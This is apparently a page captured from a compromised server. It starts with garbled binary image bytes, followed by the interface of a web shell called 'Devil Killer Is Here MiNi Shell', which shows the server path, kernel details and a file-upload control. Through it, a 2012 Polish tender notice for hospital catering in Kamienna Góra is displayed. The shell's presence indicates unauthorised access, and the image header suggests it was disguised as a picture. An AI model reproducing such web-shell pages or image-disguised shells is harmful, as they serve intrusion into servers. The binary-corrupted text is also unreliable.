JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120214/36053-N-2012.html

<p class="kh_header"><b>Kamienna Góra: świadczenie usług żywienia zbiorowego wraz z dystrybucją posiłków dla hospitalizowanych pacjentów   dla   PCZ w Kamiennej Górze Sp. z o. o. NZOZ Szpital  Powiatowy</b><br>
<b>Numer ogłoszenia: 36053 - 2012; data zamieszczenia: 14.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o.o. Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy , ul. Bohaterów Getta 10, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 7449033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcz.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zaakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług żywienia zbiorowego wraz z dystrybucją posiłków dla hospitalizowanych pacjentów   dla   PCZ w Kamiennej Górze Sp. z o. o. NZOZ Szpital  Powiatowy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o. o. Niepubliczny Zakład Opieki Zdrowotnej Szpital  Powiatowy zaprasza do udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego nr 3-2012  na  świadczenie usług żywienia zbiorowego wraz z dystrybucją posiłków dla hospitalizowanych pacjentów   dla  PCZ w  Kamiennej Górze Sp. z o. o . NZOZ Szpitala Powiatowego.
 
Usługi żywienia zbiorowego  będą się odbywały na miejscu w Szpitalu Powiatowym w Kamiennej Górze przy ulicy Bohaterów Getta 10  w zakresie:
       a) sporządzania całodziennych  posiłków   dla pacjentów z uwzględnieniem diet  indywidualnych,
b) dystrybucji posiłków w systemie tackowym na poszczególne oddziały, 
c) podawania i odbioru tacek od pacjentów i ich transportowanie do kuchni  po skończonym posiłku,
d)  utylizacji resztek i odpadów pokonsumpcyjnych,
e)  mycia naczyń,  wózków i sprzętu w zmywaku,
f) utrzymania  w czystości pomieszczeń kuchni z zapleczem oraz  przechowywania  sprzętu i urządzeń do   dystrybucji  posiłków,
g) codzienne sporządzanie jadłospisów oraz przekazywanie do oddziałów, 
h) sporządzanie jadłospisów dekadowych wraz z określeniem kaloryczności  posiłków. 

      Transport posiłków w oddziały szpitalne winien być zgodny z obowiązującymi przepisami. Pojazdy przeznaczone do transportu posiłków winny być na bieżąco  poddawane  myciu i dezynfekcji.  Oferent winien posiadać niezbędne uprawnienia  do wykonania przedmiotu zamówienia oraz  nowoczesne wyposażenie techniczne. Oferent zobowiązuje się wykonać całość przedmiotu zamówienia przy współpracy  z Zamawiającym. Usługi żywienia zbiorowego  będą wykonywane na  terenie obiektu szpitala i będą   podlegały ocenie wewnętrznej Zamawiającego. Zamawiający wyznaczy Naczelną pielęgniarkę do nadzoru jakości przygotowywanych i dystrybuowanych posiłków  a  do bezpośredniego kontaktu w sprawach utrzymania reżimu sanitarnego świadczonej usługi Zamawiający wyznaczy pielęgniarkę epidemiologiczną. 
       Usługi żywienia zbiorowego  będą podlegały ocenie wewnętrznej Zamawiającego. Raz na kwartał zostanie sporządzany protokół stwierdzający jakość wykonywanych usług i podpisany przez przedstawicieli Stron.    Również Wykonawca zapewni codzienny nadzór nad personelem dystrybuującym. Wykonawca zobowiązuje się do wykonania usług z zachowaniem wszelkich przepisów sanitarnych i higienicznych jakie są wymagane do tego rodzaju usług.
        Za przestrzeganie przepisów sanitarnych, bhp oraz  p. poż. przy świadczeniu usług odpowiedzialność ponosi Wykonawca.  Wykonawca odpowiada bezpośrednio przed organami nadzorująco - kontrolnymi za utrzymanie   reżimu sanitarnego w zakresie świadczonej usługi żywienia zbiorowego. Wykonawca winien posiadać uprawnienia do prowadzenia usług żywienia zbiorowego.
Firma zobowiązuje się do:
świadczenia  dobrej jakości  usługi zgodnie z normami  żywieniowymi, sanitarnymi i innymi obowiązującymi  przepisami prawa w tym zakresie, 
-      organizacji pracy w sposób zapewniający szczególną staranność  i należyte wykonanie przedmiotu zamówienia.
    Usługi żywienia zbiorowego wraz z dystrybucją będą się odbywały na terenie obiektu Szpitala Powiatowego w Kamiennej Górze przy ul. Bohaterów Getta 10 w związku z powyższym oferent zapozna się z obiektem szpitala i  pomieszczeniami, gdzie świadczone będą usługi żywienia zbiorowego oraz dystrybucji.
Oferent, który wygra przetarg  jest zobowiązany zapewnić własny personel w takiej ilości osób, która zapewni należyte wykonanie usługi.  Zamawiający nadmienia, iż kuchnia szpitalna została sprywatyzowana w  1999r.  w związku z czym do obowiązków przyszłego Wykonawcy nie będzie należało przejmowanie  pracowników Zamawiającego.  Do  profesjonalnego   wykonywania usługi wykonawca  użyje  sprzętu gastronomicznego (lub będzie dzierżawił  uzupełniając sprzęt   Zamawiającego przekazany w drodze dzierżawy)  oraz artykułów żywnościowych przez siebie zakupionych. 
Zamawiający informuje, ze istnieje możliwość wydzierżawienia sprzętu   obecnie wykorzystywanego do świadczenia posiłków (tj. tacki termoizolacyjne oraz wózki do transportu posiłków) oraz pomieszczenia do jego przekazywania i mycia  na podstawie odrębnej umowy. Zaleca się jednak uzupełnienie brakującego i niezbędnego sprzętu do dystrybucji  na koszt własny oferenta.
        Zamawiający wydzierżawi wykonawcy  sprzęt i urządzenia gastronomiczne znajdujące się w pomieszczeniach kuchni centralnej, do świadczenia  usług żywieniowych i dystrybucji posiłków będący jego własnością.
W  przypadku chęci dzierżawy urządzeń w związku z obowiązkiem kompleksowego i profesjonalnego wykonania usługi żywienia zbiorowego wraz z dystrybucją posiłków w oddziały szpitalne - Wykonawca uzupełni sprzęt gastronomiczny  Zamawiającego i zakupi min. niezbędny sprzęt: termosy, czajniki, lodówki, zamrażarki, talerze, pokrywki, garnki, szafa)  i  wkalkuluje go w wartość świadczonej kompleksowej usługi.  Zamawiającemu chodzi o termosy   w ilości ok. 5 sztuk, które będą przeznaczone na herbatę dla pacjentów na oddziały szpitalne.  
        W przypadku  pozostałego  sprzętu tj.: lodówki, zamrażarki oraz brakujące niezbędne rzeczy jak: talerze (płaskie, głębokie), garnki, miski na zupę, miski - salaterki,  szkło, pokrywki, sztućce czy wiadra metalowe, plastikowe itd.   przyszły Wykonawca winien uzupełnić i doposażyć w ilość jaką sam uzna za konieczną z uwagi na częstotliwość realizowania zamówienia żywności. Zakup brakującego asortymentu należy zrealizować w przeliczeniu na  ilość dziennych  posiłków, co zostało podane w siwz i wynosi ok. 70 dziennie + zapas (tłukące szkło).  Po stronie Wykonawcy 
 będzie  zaopatrzenie  w sprzęt i środki  chemiczne, które będą używane przez niego  do wykonywania usługi  - winny spełniać warunki takie, jak sprzęt stosowany w placówkach służby zdrowia i być dopuszczone do obrotu w  placówkach służby zdrowia.  Zamawiający informuje, iż urządzenia AGD zamieszczone w zał nr  l nie podlegają UDT.
      Zamawiający zobowiązuje się oddać wykonawcy w najem pomieszczenie na poziomie przyziemia o  powierzchni 250,30 m2 mieszczące się w PCZ  sp zoo przy ulicy Bohaterów Getta 10 w Kamiennej Górze  wraz  ze znajdującymi się tam urządzeniami do dystrybucji posiłków.
       Sprzęt stanowiący własność Zamawiającego będzie wynajmowany według spisu inwentaryzacyjnego -  nie później niż w dniu następnym  po podpisaniu  umowy. 
         Zamawiający wymaga od oferenta zapoznania się z podstawowymi zasadami pracy w szpitalu i stosowania ich tak, aby  realizacja zamówienia nie utrudniała pracy  personelowi medycznemu, pacjentom i  innym firmom. 
        Od Wykonawcy wymaga się również posiadanie umiejętności i wiedzy w zakresie przepisów wewnątrz kuchennych, organizacji pracy jak i znajomości uprawnień na określonych stanowiskach pracy. 
       W związku z  wejściem Polski do Unii Europejskiej z dniem 01.05.2004r. firma, która wygra przetarg zobowiązana jest do  w prowadzenia systemu HACCP.
Zamawiający informuje, że usługi żywienia zbiorowego dotyczą hospitalizowanych pacjentów. Kwestia żywienia pracowników  szpitala, nie dotyczy przetargu, jest to indywidualne podejście każdego oferenta do tematu.
      W związku z wymogiem odbioru i utylizacji odpadków  pokonsumpcyjnych przez Wykonawcę - Zamawiający udostępni Wykonawcy odpowiednio usytuowane miejsce  (miejsce takie znajduje się przed wejściem bocznym do szpitala od strony kotłowni  lub przed warsztatem, gdzie znajduje się kontener na śmieci komunalne). 
Zamawiający informuje, iż stan techniczny  oraz sanitarny pomieszczeń, które będą podlegały dzierżawie jest dobry  i spełnia wytyczne  oraz zalecenia sanepidu, w tym wymogi sanitarne i epidemiologiczne zgodnie z obowiązującymi przepisami w tym Rozporządzenia Ministra Zdrowia  z dnia 10 listopada 2006r.  W sprawie, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. 213, poz. 1568).   
         Pomieszczenia te są gotowe do realizowania w nich przedmiotu zamówienia bez dokonywania inwestycji. Szpital  na bieżąco  realizuje wszystkie zalecenia sanepidu dotyczące otoczenia kuchni i dojść do niej (w chwili obecnej ma decyzję dotyczącą dojścia do kuchni od strony parkingu). Natomiast zalecenia SANEPID-u dotyczące stanu sanitarno - technicznego wewnątrz kuchni, jak i jej pomieszczeń realizuje sam dzierżawca. W chwili przekazania kuchni obecnemu dzierżawcy, kuchnia spełniała wymogi wyżej cytowanego Rozporządzenia. Pomieszczenie to jest wentylowane. Na podłodze znajdują się płytki podłogowe, tzw. glazura.  Powierzchnia jest zmywalna.  
Wykonawca  będzie ponosił opłaty eksploatacyjne osobno wg obowiązujących stawek i wskazania licznika:
        -  opłata za energię  elektryczną  
        -  opłata za gaz
Natomiast na koszt dzierżawy kuchni i jej zaplecza  składają się następujące koszty:
-    wynajmu pomieszczeń kuchennych i magazynu,
-    dzierżawy sprzętu gastronomicznego,
      -   zużycia wody  zimnej i ciepłej oraz wywozu nieczystości stałych - według których zamawiający będzie wystawiał  
           fakturę   vat,
-    udostępnienie miejsca na odpadki. 
Koszt dzierżawy w/w mediów i pomieszczeń w skali miesiąca wynosi 3.750 PLN  złotych netto plus 23% podatku vat. Wykaz sprzętu gastronomicznego, który będzie podlegał dzierżawie został dołączony do  siwz w formie załącznika. 
Zamawiający  informuje, że średnio-miesięczne zużycie energii wykorzystywanej na potrzeby kuchni  wynosi  1300 kwh, gazu - w ilości 300 m3. 
        W szpitalu stosowany jest następujący schemat diet, jak w załączniku nr o.

        Ilości prowadzonych diet są uzależnione od zaleceń lekarskich. Zamawiający informuje, że w przypadku pacjentów będących na dietach poza cukrzycą  (dzieci i dorośli)  liczba posiłków w ciągu dnia wynosi 3: śniadanie, obiad, kolacja. Pacjenci na diecie cukrzycowej  - liczba posiłków  równa się 5: śniadanie, 2-gie śniadanie, obiad, podwieczorek, kolacja.    
      Zamawiający nie  prowadzi kuchni mlecznej - żywienie pacjentów hospitalizowanych nie obejmuje tzw. małych pacjentów (noworodki) są żywione w oddziale neonatologiczno - położniczym  wg innych zasad (gotowymi mieszankami z apteki szpitalnej lub we własnym zakresie pacjenta), tak więc usługa nie obejmuje żywienia noworodków. 
Oferta  cenowa powinna być podana w PLN zł  oraz winna zawierać cenę jednostkową - stawkę żywieniową  za jeden dzień obejmującą trzy posiłki dziennie: (śniadanie, obiad, kolacja) na jednego pacjenta  oraz umowną wartość oferty za rok.
       Oferta  cenowa winna zawierać  całkowity koszt wykonania  usługi za okres 12  miesięcy, który oznacza faktyczną ilość stawek żywieniowych dziennych przypadających na jednego pacjenta  w ciągu roku  pomnożoną przez cenę jedn. (stawkę żywieniową za jeden dzień).
    Wykonawca zobowiązany jest do zachowania szczególnej staranności przy wykonywaniu zamówienia, przy uwzględnieniu specyficznego  charakteru prowadzonej działalności.
     Wykonawca zobowiązuje się do wykonania usług z zachowaniem wszelkich przepisów i norm sanitarnych i higienicznych i bhp  jakie są wymagane do tego rodzaju usług.
Wykonawca odpowiada bezpośrednio przed organami nadzorująco - kontrolnymi zamawiającego za utrzymanie reżimu sanitarnego żywienia zbiorowego.
        Wykonawca ponosi odpowiedzialność za niewykonanie lub nienależyte wykonanie przedmiotu umowy.
     Wykonawca ponosi odpowiedzialność za szkody powstałe na: osobach i mieniu osób przebywających na terenie szpitala oraz mieniu zamawiającego, które wynikły z niewykonania, bądź nie należytego wykonania przedmiotu umowy.
       Zamawiający przedstawia niezbędne dla oferenta informacje w formie załączników:
-      spis urządzeń gastronomicznych do dystrybucji posiłków 
harmonogram dystrybucji posiłków w oddziały szpitalne.
-      normy żywienia zbiorowego 
         Ilość łóżek przypadających w rozbiciu na oddziały szpitalne w ciągu 2010r.  wyniosła 162 sztuki.  
        Ilość przyjęć pacjentów w ciągu 2010  roku 5.834   osób. 
        Średnie obłożenie łóżka w ciągu 2010  roku wyniosło 51%. 
        W ciągu 12 m.-cy 24.000   stawek żywieniowych dziennych.
        Zamawiający informuje, że średnio dziennie w naszej placówce jest wydawanych  około 60 - 70  posiłków. 
       Usługa  będzie wykonywana   wewnątrz czynnego budynku szpitala i wszystkie   usługi  będą prowadzone przy czynnych oddziałach szpitalnych.  W związku z tym Zamawiający wymaga od Wykonawcy zapoznania się z podstawowymi zasadami pracy w szpitalu i stosowania ich tak, aby nie  zakłócały  jego funkcjonowania, w tym pracy personelu medycznego, pacjentom i firmie. Ponadto wykonawca zobowiązuje się nie wykonywać prac  związanych z realizacją niniejszej umowy w godzinach szpitalnej ciszy nocnej (od godz. 22.00 do godz. 6.00 rano).
         
 
Szczegółowe warunki usługi  określa się w umowie zał nr g,  g1.  Zamówienie to nie jest finansowane ze środków własnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.51.10.00-0, 55.50.00.00-0, 55.51.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia  
       lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym;
      -  złożą  oświadczenie, że osoby, które będą uczestniczyć  w wykonywaniu zamówienia, posiadają  wymagane   
         uprawnienia, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wyrażające się tym, że jako wykonawca   brał udział  w co najmniej 1 usłudze (odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia  z  podaniem ich wartości, przedmiotu, dat wykonania i odbiorców) wykonanych (zakończonych) lub wykonywanych  wraz z dokumentami (referencjami), z których wynikać musi, że usługi  te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>załączniki: 
 
1.1     formularz ofertowy zał nr a
1.2     oświadczenie oferenta nr b
1.3     oświadczenie w sprawie stosowania się do siwz zał nr c
1.4   formularz upoważnienia do podpisania oferty zał nr d*
1.5   formularz cenowy  nr  e
1.6   oświadczenie  z art . 44 zal nr f
1.7   projekt  umowy zał nr  g, g1
1.8   podwykonawcy zał nr h
1.9   oświadczenie oferenta o spełnianiu warunków udziału w postępowaniu zał nr j
1.10   harmonogram dystrybucji posiłków w oddziały szpitalne - zał nr k
1.11  spis urządzeń gastronomicznych do dystrybucji posiłków  do wydzierżawienia, spis urządzeń gastronomicznych 
  pozostałych - zał  nr  l
1.12   dokument ubezpieczenia - zał nr m
1.13    normy wyżywienia dla chorych dzieci i dorosłych i zbiory receptur - zal nr n
1.14     wykaz diet - zał nr o</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonywania zmian w umowie.
2. Zmiana umowy może być dokonana w granicach wyznaczonych przepisami ustawy, 
w tym Art. 144 ustawy, wyłącznie za zgodą obu Stron, w formie pisemnej pod rygorem nieważności.
3. Zamawiający dopuści możliwość dokonywania zmian w treści umowy w stosunku do treści oferty Wykonawcy w  sytuacjach, gdy wystąpi co najmniej jedna z poniżej wymienionych okoliczności:
wystąpi siła wyższa mająca wpływ na realizację umowy,
zaistnieje omyłka pisarska lub rachunkowa,
nieistotne zmiany umowy, 
zachodzi konieczność zmiany terminu  wykonania przedmiotu zamówienia, w przypadku, gdy nie można było tego przewidzieć w chwili podpisania umowy,
niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego lub jest konieczna w celu prawidłowego wykonania umowy,
jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, a w szczególności w przypadku ustawowej zmiany podatku VAT,
zachodzi konieczność zmiany w zakresie podwykonawstwa, za uprzednią zgodą Zamawiającego: możliwe jest powierzenie podwykonawcom innego zakresu części zamówienia niż wskazany w ofercie Wykonawcy, a także możliwa jest zmiana podwykonawcy na etapie realizacji zamówienia, o ile nie jest to sprzeczne z postanowieniami SIWZ,
możliwa jest korzystna dla Zamawiającego zmiana terminu i sposobu płatności za realizację przedmiotu zamówienia,
nastąpiła zmiana danych Wykonawcy  w tym min. formy organizacyjno - prawnej,
 zmiana rachunku bankowego i innych danych stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcz.org.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWE CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  Sp. z o. o.
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
58-400 Kamienna Góra, ul. Bohaterów Getta 10, woj. dolnośląskie 
dział zam. publ..</p>
